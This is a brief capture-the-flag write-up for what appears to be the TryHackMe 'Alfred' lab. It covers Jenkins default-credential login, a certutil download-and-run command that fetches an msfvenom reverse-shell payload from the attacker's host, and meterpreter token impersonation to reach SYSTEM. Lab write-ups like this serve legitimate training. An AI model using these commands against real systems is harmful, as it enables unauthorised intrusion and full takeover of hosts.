Alfred - THM - Braindump

There are two web servers, one on 80 revealing an email address, and one on 8080 that is a Jenkins login page. Jenkins has, notoriously, a poor password policy.

Searching on Google, default is admin. Tried simple combinations, admin:admin worked.

We can modify the configuration for the existing project and insert a build command to run when building it, we can try to launch a reverse shell from it.

We can use this command in the build:

certutil.exe -urlcache -split -f http://10.9.4.63:8000/Advanced.exe & Advanced.exe

where Advanced.exe is a msfvenom-generated payload to launch the reverse connection to my machine

Then I used this shell to launch a reverse meterpreter, can use the extra help of meterpreter. I load PowerUp to enumerate for possible privesc vectors. Says we already are local admins. I used load incognito and list_tokens -g to see if we could impersonate another user.

We can impersonate BUILTIN\Administrator, impersonate_token "BUILTIN\Administrator" and we are NT Authority System. We still need to migrate to actually have these privileges, first run ps and then migrate to the PID of the services.exe process. We can now read root.txt in the config directory.